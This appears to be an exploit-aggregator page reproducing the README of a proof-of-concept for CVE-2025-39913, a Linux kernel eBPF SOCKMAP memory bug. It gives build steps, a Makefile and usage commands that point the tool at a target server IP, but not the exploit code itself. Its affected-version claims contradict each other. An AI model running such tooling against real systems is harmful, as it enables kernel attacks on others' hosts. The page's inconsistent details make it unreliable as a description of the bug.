Related vulnerability
Description
UAF in Linux kernel >= 6.1.152 (psock->cork)
Introduction
# CVE-2025-39913 - Linux Kernel eBPF SOCKMAP (UAF)
**Author: Byte Reaper**
**My platform: <https://www.bytrep.com/>**
## Description
- This repository contains a technical proof-of-concept for CVE-2025-39913, a vulnerability in the Linux kernel's tcp_bpf_send_verdict() function. When bpf_msg_cork_bytes() fails to allocate psock->cork, the kernel may skip freeing the sk_msg, leading to memory mismanagement. This can result in memory leaks or potential use-after-free (UAF) conditions under specific eBPF sk_msg operations.
- Affects Linux kernel versions ≤ 6.12.38 with SOCKMAP support.
## Requirements
```
Kernel ≤ 6.12.38
Linux x86_64
GCC
```
## Build
1. Create the Makefile:
```
# touch Makefile
```
2. Paste the following into the Makefile (recipe lines must be indented with a tab):
```
TARGET := CVE-2025-39913
KERNEL_PATH := /usr/src/linux-headers-$(shell uname -r)
BPF_OBJ := bpf_injection.o
USER_SRCS := main.c load_bpf.c check_bpfELf.c pingCheck.c com_c.c exit_asm.c sockmap_link.c check_elf.c result.c argparse.c
USER_OBJS := $(USER_SRCS:.c=.o)
ALL_OBJS := $(USER_OBJS) $(BPF_OBJ)
LIBS := -l:libbpf.a -lrt -lelf -lz

$(TARGET): $(ALL_OBJS)
	gcc $(USER_OBJS) -o $@ $(LIBS)

%.o: %.c
	gcc -c $< -o $@

$(BPF_OBJ): bpf_injection.c
	clang -O2 -target bpf -c $< -o $@ \
	-nostdinc \
	-I/usr/lib/clang/19/include \
	-I$(KERNEL_PATH)/arch/x86/include \
	-I$(KERNEL_PATH)/arch/x86/include/generated \
	-I$(KERNEL_PATH)/include \
	-I$(KERNEL_PATH)/include/uapi \
	-I$(KERNEL_PATH)/include/generated/uapi \
	-I$(KERNEL_PATH)/include/asm-generic \
	-I/usr/include

clean:
```
## Run
```
1 - Target IP address:
# ./CVE-2025-39913 -i [server-ip]
2 - Target port (default: 80):
# ./CVE-2025-39913 -i [server-ip] -p [PORT]
3 - Full argument list:
# ./CVE-2025-39913 -h
4 - Check the BPF object file:
# ./CVE-2025-39913 -i [server-ip] -p [PORT] -o
5 - Check debug tracing:
# ./CVE-2025-39913 -i [server-ip] -p [PORT] -c
```
## References
- **Linux BPF TCP** – <https://docs.kernel.org/networking/filter.html>
- **bpf.h** – <https://codebrowser.dev/linux/include/linux/bpf.h.html>
- **NVD (CVE-2025-39913)** – <https://nvd.nist.gov/vuln/detail/CVE-2025-39913>
- **Create SOCKMAP** – <https://docs.kernel.org/bpf/map_sockmap.html>
- **POC** – <https://bytrep.com/exploit39913.html>
## Observation
- This exploit is taken from the platform https://bytrep.com/
## License
MIT
File snapshot
```
[4.0K] /data/pocs/5429d7cd38e2884c5063487fefb83235b7f5b6fb
├── [1.0K] LICENSE
├── [2.7K] README.md
└── [4.0K] src
    ├── [ 73] asm_exit.h
    ├── [3.0K] bpf_injection.c
    ├── [ 145] bpfO.h
    ├── [2.9K] check_bpfELf.c
    ├── [ 20K] check_elf.c
    ├── [6.7K] com_c.c
    ├── [ 75] com_c.h
    ├── [1.1K] exit_asm.c
    ├── [1.8K] load_bpf.c
    ├── [ 108] load_bpf.h
    ├── [7.2K] main.c
    ├── [1008] Makefile
    ├── [ 108] map_check.h
    ├── [ 84] pingC.h
    ├── [3.5K] pingCheck.c
    ├── [3.9K] result.c
    ├── [ 221] sockmapBuild.h
    └── [ 13K] sockmap_link.c

1 directory, 20 files
```
Notes
1. It is recommended to access the original source first.
2. If the source is unavailable or cannot be accessed, please email f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for local POCs. Thank you for your support.